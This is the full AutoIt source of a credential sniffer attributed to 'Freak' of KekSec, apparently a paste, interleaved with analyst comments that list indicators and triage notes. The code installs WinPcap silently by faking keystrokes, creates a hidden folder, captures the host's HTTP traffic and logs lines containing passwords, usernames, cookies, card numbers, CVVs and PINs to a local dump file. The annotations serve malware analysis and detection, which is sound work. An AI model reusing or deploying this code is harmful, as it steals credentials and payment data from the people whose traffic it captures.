KekSec

Private Sniffer Source code by Freak

Sep 7th, 2020 (edited)
  ; Build directives for the AutoIt3Wrapper compile step. Analyst notes:
  ;  - #NoTrayIcon suppresses the AutoIt tray icon, so the running script shows no UI of its own.
  ;  - The compiled output is named sniffer.exe and is packed with UPX (UseUpx=y).
  ;  - requestedExecutionLevel=asInvoker: the embedded manifest does not request elevation.
  ;  - Au3Stripper runs before compilation, so the script embedded in a compiled sample may not match
  ;    this listing line for line - TODO confirm against a sample.
  1. #NoTrayIcon
  2. #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
  3. #AutoIt3Wrapper_Outfile=sniffer.exe
  4. #AutoIt3Wrapper_Compression=4
  5. #AutoIt3Wrapper_UseUpx=y
  6. #AutoIt3Wrapper_Res_Language=1033
  7. #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
  8. #AutoIt3Wrapper_Run_Tidy=y
  9. #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
  10. #AutoIt3Wrapper_Tidy_Stop_OnError=n
  11. #AutoIt3Wrapper_Run_Au3Stripper=y
  12. #Au3Stripper_Parameters=/so /mi 5 /mo
  13. #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
  14. #include <Crypt.au3>
  15. ;==============================================;
  16. ; Thanatos AutoIt Crypter stub By Freak        ;
  17. ; Coded By Freak                               ;
  18. ; Thanks to M3 for GUI                         ;
  19. ; Keep Credits if you Using Source             ;
  20. ;==============================================;
  ; Runtime configuration. These values are the host artefacts the script creates or relies on,
  ; which makes them the most useful indicators for triage of an affected machine.
  21. Opt("ExpandEnvStrings", 1)
  22.  
  ; Working directory under the per-user application-data folder. installPCAP() creates it and
  ; marks it system + hidden, so it is not shown by a default Explorer view.
  23. Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
  ; Output file: the main loop appends every matched payload line here. No code in this listing
  ; reads the file back or sends it anywhere.
  24. Global $lootLoc = $installdir & "\dump.dat"
  ; Capture-filter fragment: TCP ports 80, 8080, 8888 and 8181 only (presumably cleartext HTTP;
  ; no TLS port is listed).
  25. Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
  ; Single-instance marker. The decoded byte string is passed to _Singleton(), which uses it as the
  ; name of a kernel semaphore (not a mutex), so handle-based hunting should look at Semaphore objects.
  26. Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
  27.  
  ; Startup sequence, executed at script load:
  ;  1. _Singleton() terminates the process if the named semaphore already exists.
  ;  2. If wpcap.dll is absent from the system directory, the WinPcap 4.1.3 installer is downloaded
  ;     from winpcap.org into the temp directory, launched, and its setup wizard is driven with
  ;     Send()/ControlClick(). WinWaitActive() is used, so the wizard pages are real active windows.
  ;  3. The working directory is created, wpcap.dll is loaded and a capture is opened.
  ; Detection notes: a WinPcap_4_1_3.exe written to and started from the temp directory by a
  ; non-installer parent, synthetic keystrokes sent to the "WinPcap 4.1.3 Setup" window, and
  ; wpcap.dll appearing on a host with no sanctioned capture tooling are the visible side effects.
  ; No persistence mechanism and no upload of the output file appear anywhere in this listing.
  28. _Singleton($sMutex)
  29. If Not FileExists(@SystemDir & "\wpcap.dll") Then
  30.     InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
  31.     Run(@TempDir & "\WinPcap_4_1_3.exe")
  32.     WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
  33.     Send("!n")
  34.     WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
  35.     Send("!a")
  36.     WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
  37.     ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
  38.     WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
  39.     Send("!f")
  40. EndIf
  ; Despite its name, installPCAP() only creates the hidden working directory.
  41. installPCAP()
  42. $winpcap = _PcapSetup()
  43. $pcap_devices = _PcapGetDeviceList()
  ; The adapter is fixed to the first entry of the device list.
  44. $iface = 0
  ; Filter is "host <column 7 of the adapter row> and <$sniffopt>"; column 7 is filled by
  ; _PcapGetDeviceList() from the adapter's short-form (IPv4-length) address. The remaining
  ; arguments are promiscuous = 0, snap length 65536, buffer 2^24 bytes, realtime = 0, so only
  ; traffic to or from this host's own address on the listed ports is captured.
  45. $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
  ; Substrings searched for in every captured payload. The list mixes HTTP request markers
  ; (request line, Host, User-Agent, Content-*, Cookie) with form-field names for credentials
  ; and payment-card data. The main loop calls StringInStr() without a case-sense argument,
  ; and AutoIt's default for that function is a case-insensitive match.
  ; The literals appear verbatim in the script and are candidate static-signature strings;
  ; a compiled, UPX-packed sample has to be unpacked before they are visible.
  46. Dim $keywords[20]
  47. $keywords[0] = "GET /"
  48. $keywords[1] = "POST /"
  49. $keywords[2] = "Host: "
  50. $keywords[3] = "User-Agent: "
  51. $keywords[4] = "Content-"
  52. $keywords[5] = "password="
  53. $keywords[6] = "user_name="
  54. $keywords[7] = "user="
  55. $keywords[8] = "Username="
  56. $keywords[9] = "User="
  57. $keywords[10] = "login="
  58. $keywords[11] = "email="
  59. $keywords[12] = "username="
  60. $keywords[13] = "holder="
  61. $keywords[14] = "number="
  62. $keywords[15] = "cvv="
  63. $keywords[16] = "pin="
  64. $keywords[17] = "transaction"
  65. $keywords[18] = "bank"
  66. $keywords[19] = "Cookie: "
  ; Main capture loop. Each iteration takes one parsed packet from _TCP_Recv(), decodes the
  ; payload hex to text, and appends every payload line containing a keyword to the output file.
  ; The file is opened in append mode (FileOpen mode 1) and flushed after each write, so
  ; dump.dat grows incrementally and holds plain text. Everything stays on local disk: this
  ; listing contains no code that transmits the file.
  67. $lootHandle = FileOpen($lootLoc, 1)
  68. $sPacketText = ""
  69. $oldPacketText = ""
  70. While True
  71.     $aPacket = _TCP_Recv($pcap)
  ; _TCP_Recv() returns a 21-element array on success and -1 on timeout; element 20 is the payload.
  72.     If UBound($aPacket) > 20 Then
  73.         $sPacketText = BinaryToString("0x" & $aPacket[20])
  ; Skip a payload identical to the previous one, after a 250 ms pause.
  74.         If $sPacketText = $oldPacketText Then
  75.             Sleep(250)
  76.             ContinueLoop
  77.         EndIf
  78.         If StringLen($sPacketText) > 13 Then
  79.             For $key = 0 To UBound($keywords) - 1
  80.                 If StringInStr($sPacketText, $keywords[$key]) Then
  ; $aPacket[14] is the destination-port field. NOTE(review): this looks like an attempt to
  ; skip traffic to port 6667 - confirm that the conversion really yields the numeric port.
  81.                     If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
  ; Carriage returns are dropped and the payload is split on line feeds; only the lines that
  ; contain the current keyword are written out.
  82.                     $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
  83.                     For $aPT = 1 To UBound($aPacketText) - 1
  84.                         If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
  85.                             FileWriteLine($lootHandle, $aPacketText[$aPT])
  86.                             FileFlush($lootHandle)
  87.                             $oldPacketText = $sPacketText
  88.                         EndIf
  89.                     Next
  90.                     $oldPacketText = $sPacketText
  91.                 Else
  ; Payloads are echoed to the console stream once per keyword that does not match.
  92.                     ConsoleWrite($sPacketText & @CRLF)
  93.                 EndIf
  94.             Next
  95.         EndIf
  96.     EndIf
  97.     $oldPacketText = $sPacketText
  98. WEnd
  ; Enumerates capture adapters through wpcap.dll (pcap_findalldevs_ex on "rpcap://") and
  ; packet.dll, and returns a 2-D array with one 14-column row per adapter, or -1 on failure.
  ; Columns as filled below:
  ;   [0] device name            [1] description
  ;   [2] link-type value        [3] link-type name       [4] link-type description
  ;   [5] speed (PacketGetNetType) [6] MAC address as aa:bb:cc:dd:ee:ff
  ;   [7],[8],[9]    addr / netmask / broadaddr when the text form is 7-15 characters
  ;   [10],[11],[12] addr / netmask / broadaddr when the text form is longer than 15 characters
  ;   [13] adapter flags
  ; Relies on the globals $Pcap_dll and $Pcap_errbuf created by _PcapSetup().
  ; Detection note: wpcap.dll and packet.dll being loaded by a process that is not a known
  ; capture tool is the module-load footprint of this function.
  99. Func _PcapGetDeviceList()
  100.     Local $alldevs = DllStructCreate("ptr")
  101.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
  102.     If (@error > 0) Then Return -1
  103.     If $r[0] = -1 Then Return -1
  104.     Local $next = DllStructGetData($alldevs, 1)
  105.     Local $list[1][14]
  106.     Local $i = 0
  ; Walk the linked list of adapter records returned by the library.
  107.     While ($next <> 0)
  108.         Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
  109.         Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
  110.         Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
  111.         $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
  112.         $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
  113.         Local $next_addr = DllStructGetData($pcap_if, "addresses")
  ; The first 8 characters of the name are removed (the length of the "rpcap://" prefix used
  ; above) before the name is handed to packet.dll.
  114.         Local $device = StringTrimLeft($list[$i][0], 8)
  115.         Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
  116.         DllStructSetData($snames, 1, $device)
  117.         Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
  118.         If IsPtr($handle[0]) Then
  ; OID request with a 6-byte result buffer; 0x01010102 is presumably the 802.3 current-address OID.
  119.             Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
  120.             DllStructSetData($packetoiddata, 1, 0x01010102)
  121.             DllStructSetData($packetoiddata, 2, 6)
  122.             Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
  123.             If $status[0] Then
  124.                 Local $mac = DllStructGetData($packetoiddata, 3)
  125.                 $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
  126.             EndIf
  127.             Local $nettype = DllStructCreate("uint type;uint64 speed")
  128.             $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
  129.             If $status[0] Then
  130.                 $list[$i][5] = DllStructGetData($nettype, 2)
  131.             EndIf
  132.             DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
  133.         EndIf
  ; Short-lived probe capture (placeholder filter, 32-byte snap length) opened only to read
  ; the adapter's link type; it is closed again immediately.
  134.         Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
  135.         If IsPtr($pcap) Then
  136.             Local $types = _PcapGetLinkType($pcap)
  137.             If IsArray($types) Then
  138.                 $list[$i][2] = $types[0]
  139.                 $list[$i][3] = $types[1]
  140.                 $list[$i][4] = $types[2]
  141.             EndIf
  142.             _PcapStopCapture($pcap)
  143.         EndIf
  ; Walk the adapter's address list; each address is sorted into a column by its text length.
  144.         While $next_addr <> 0
  145.             Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
  146.             Local $j, $addr
  147.             For $j = 2 To 4
  148.                 $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
  149.                 If StringLen($addr) > 15 Then
  150.                     $list[$i][$j + 8] = $addr
  151.                 ElseIf StringLen($addr) > 6 Then
  152.                     $list[$i][$j + 5] = $addr
  153.                 EndIf
  154.             Next
  155.             $next_addr = DllStructGetData($pcap_addr, 1)
  156.         WEnd
  157.         $list[$i][13] = DllStructGetData($pcap_if, 5)
  158.         $next = DllStructGetData($pcap_if, 1)
  159.         $i += 1
  ; Grow the result by one row only when another adapter follows.
  160.         If $next <> 0 Then ReDim $list[$i + 1][14]
  161.     WEnd
  162.     DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
  163.     Return $list
  164. EndFunc   ;==>_PcapGetDeviceList
  ; Returns the link-layer type of an open capture as a 3-element array:
  ; [0] numeric value from pcap_datalink, [1] its name, [2] its description.
  ; Returns -1 when $pcap is not a pointer. Uses the global $Pcap_dll handle.
  165. Func _PcapGetLinkType($pcap)
  166.     If Not IsPtr($pcap) Then Return -1
  167.     Local $type[3]
  168.     Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
  169.     $type[0] = $t[0]
  170.     Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
  171.     $type[1] = $name[0]
  172.     Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
  173.     $type[2] = $desc[0]
  174.     Return $type
  175. EndFunc   ;==>_PcapGetLinkType
  ; Fetches one packet from an open capture with pcap_next_ex. Any result other than 1 is
  ; returned to the caller unchanged; -1 is also returned when $pcap is not a pointer.
  ; On success the globals $Pcap_statV (bytes) and $Pcap_statN (packets) are incremented.
  176. Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successful array[0]=time [1]=captured len [2]=packet len [3]=packet data
  177.     If Not IsPtr($pcap) Then Return -1
  178.     $Pcap_ptrhdr = DllStructCreate("ptr")
  179.     $Pcap_ptrpkt = DllStructCreate("ptr")
  180.     Local $pk[4]
  181.     Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
  182.     If ($res[0] <> 1) Then Return $res[0]
  ; Overlay structs on the header and data pointers written by the library; the data struct
  ; is sized from the header's captured-length field.
  183.     Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
  184.     Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
  ; Seconds-of-day after applying the $Pcap_timebias offset, formatted as HH:MM:SS.microseconds.
  185.     Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
  186.     $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
  187.     $pk[1] = DllStructGetData($pkthdr, 3)
  188.     $pk[2] = DllStructGetData($pkthdr, 4)
  189.     $pk[3] = DllStructGetData($packet, 1)
  190.     $Pcap_statV += $pk[2]
  191.     $Pcap_statN += 1
  192.     Return $pk
  193. EndFunc   ;==>_PcapGetPacket
  ; Copies $data into a byte buffer and passes it to pcap_sendpacket on the given capture
  ; handle; returns the library's result, or -1 when $pcap is not a pointer.
  ; No code in this listing calls this function.
  194. Func _PcapSendPacket($pcap, $data) ; data in Binary Format
  195.     If Not IsPtr($pcap) Then Return -1
  196.     Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
  197.     DllStructSetData($databuffer, 1, $data)
  198.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
  199.     Return $r[0]
  200. EndFunc   ;==>_PcapSendPacket
  ; Loads wpcap.dll from the system directory and declares the globals every other _Pcap*
  ; function depends on ($Pcap_dll, $Pcap_errbuf, packet pointers, statistics, time bias).
  ; Returns the string reported by pcap_lib_version, or -1 when the DLL file is missing or
  ; the version call fails.
  201. Func _PcapSetup()    ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll
  202.     If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
  203.     Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
  204.     Global $Pcap_errbuf = DllStructCreate("char[256]")
  205.     Global $Pcap_ptrhdr = 0
  206.     Global $Pcap_ptrpkt = 0
  207.     Global $Pcap_statV        ; Total volume captured
  208.     Global $Pcap_statN        ; Total number of packets captured
  209.     Global $Pcap_starttime    ; Start time of Capture
  ; Offset in seconds derived from the ActiveTimeBias registry value; _PcapGetPacket() adds it
  ; to the packet timestamp before formatting.
  210.     Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
  211.     Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
  212.     If (@error > 0) Then Return -1
  213.     Return $v[0]
  214. EndFunc   ;==>_PcapSetup
  ; Converts a socket-address pointer to text. Family 2 yields a dotted IPv4 string, family 23
  ; yields eight colon-separated groups of four hex digits; a null pointer or any other family
  ; yields an empty string. (2 and 23 are the Windows AF_INET and AF_INET6 values.)
  215. Func _PcapSock2addr($sockaddr_ptr)
  216.     If ($sockaddr_ptr = 0) Then Return ""
  217.     Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
  218.     Local $family = DllStructGetData($sockaddr, 1)
  219.     If ($family = 2) Then
  220.         Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
  221.         Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
  222.     EndIf
  223.     If ($family = 23) Then
  224.         Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
  225.         Local $bin = DllStructGetData($sockaddr_in6, 4)
  226.         Local $i, $ipv6
  ; $bin is read as "0x" followed by hex digits: skip the prefix and take four digits per group.
  227.         For $i = 0 To 7
  228.             $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
  229.         Next
  230.         Return StringTrimRight($ipv6, 1)
  231.     EndIf
  232.     Return ""
  233. EndFunc   ;==>_PcapSock2addr
  ; Opens a capture on $DeviceName with pcap_open and returns its handle, or -1 on failure.
  ;   $filter      - capture-filter text; compiled and applied when non-empty
  ;   $promiscuous - passed to pcap_open as the flags argument
  ;   $PacketLen   - snap length passed to pcap_open
  ;   $buffersize  - passed to pcap_setbuff when greater than 0
  ;   $realtime    - when true, pcap_setmintocopy is set to 1
  ; The handle is switched to non-blocking mode, and the global statistics and start timer are
  ; reset. On a filter error the text "Filter: <library error>" is written to $Pcap_errbuf and
  ; the capture is closed.
  234. Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
  235.     Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
  236.     If (@error > 0) Then Return -1
  237.     If ($handle[0] = 0) Then Return -1
  238.     DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
  239.     If ($filter <> "") Then
  240.         Local $fcode = DllStructCreate("UINT;ptr")
  241.         Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
  242.         If ($comp[0] = -1) Then
  243.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  244.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  245.             _PcapStopCapture($handle[0])
  246.             Return -1
  247.         EndIf
  248.         Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
  249.         If ($set[0] = -1) Then
  250.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  251.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  252.             _PcapStopCapture($handle[0])
  253.             Return -1
  ; NOTE(review): the pcap_freecode call below follows a Return inside this branch and is
  ; never reached; no other path in this function calls it.
  254.             DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
  255.         EndIf
  256.     EndIf
  257.     If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
  258.     If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
  259.     $Pcap_statV = 0
  260.     $Pcap_statN = 0
  261.     $Pcap_starttime = TimerInit()
  262.     Return $handle[0]
  263. EndFunc   ;==>_PcapStartCapture
  ; Closes a capture handle with pcap_close; does nothing when $pcap is not a pointer.
  264. Func _PcapStopCapture($pcap)
  265.     If Not IsPtr($pcap) Then Return
  266.     DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
  267. EndFunc   ;==>_PcapStopCapture
  ; Single-instance guard. Creates a named kernel semaphore (the CreateMutex variant is
  ; commented out) after removing backslashes from the name, then reads GetLastError through
  ; a separate DllCall. When the object already exists (error 183):
  ;   $flag = 0  - the process exits with code -1
  ;   otherwise  - @error is set to 183 and 0 is returned
  ; In every other case the value returned by CreateSemaphore is passed back.
  ; Triage note: the instance marker is a Semaphore object, so look for it under that object
  ; type when listing the handles of a suspect process.
  268. Func _Singleton($occurenceName, $flag = 0)
  269.     Local $ERROR_ALREADY_EXISTS = 183
  270.     $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error
  271.     Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
  272.     ;    Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
  273.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
  274.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then
  275.         If $flag = 0 Then
  276.             Exit -1
  277.         Else
  278.             SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS
  279.             Return 0
  280.         EndIf
  281.     EndIf
  282.     Return $handle[0]
  283. EndFunc   ;==>_Singleton
  284.  
  ; Polls _PcapGetPacket() until a packet arrives or $iTimeOut milliseconds pass (-1 disables
  ; the limit) and returns packet number $iInstance, counted from 0, as a 21-element array of
  ; hex substrings; returns -1 on timeout.
  ; The fields are cut at fixed character positions in the "0x..." hex dump: 14 bytes of
  ; Ethernet header, then 20 bytes of IP header, then 20 bytes of TCP header. The code does
  ; not check the EtherType, the IP protocol or either header length before slicing.
  ; Element 20 is everything after the first 110 characters, i.e. the payload as hex.
  285. Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
  286.     Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
  287.     $iTimer_Capture = TimerInit()
  288.     While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
  289.         $aPacket = _PcapGetPacket($hCapture)
  ; _PcapGetPacket() returns an array only for a captured packet; status codes are skipped.
  290.         If IsArray($aPacket) Then
  291.             If $iPacket = $iInstance Then
  292.                 Local $aTCPPacket[21]
  293.                 $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address
  294.                 $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address
  295.                 $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type
  296.                 $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length
  297.                 $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differentiated Services Field
  298.                 $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length
  299.                 $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification
  300.                 $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset
  301.                 $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live
  302.                 $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol
  303.                 $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum
  304.                 $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address
  305.                 $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address
  306.                 $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port
  307.                 $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port
  308.                 $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number
  309.                 $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number
  310.                 $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags
  311.                 $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value
  312.                 $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum
  313.                 $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data
  314.                 Return $aTCPPacket
  315.             EndIf
  316.             $iPacket += 1
  317.         EndIf
  318.     WEnd
  319.     Return -1
  320. EndFunc   ;==>_TCP_Recv
  321.  
  ; Creates the working directory named by the global $installdir and sets the system and
  ; hidden attributes on it. Despite the name, nothing is installed here.
  ; Triage note: a system + hidden folder at that path containing dump.dat is the on-disk
  ; footprint; listing it requires showing hidden and protected system files.
  322. Func installPCAP()
  323.     DirCreate($installdir)
  324.     FileSetAttrib($installdir, "+SH")
  325. EndFunc   ;==>installPCAP
  326.  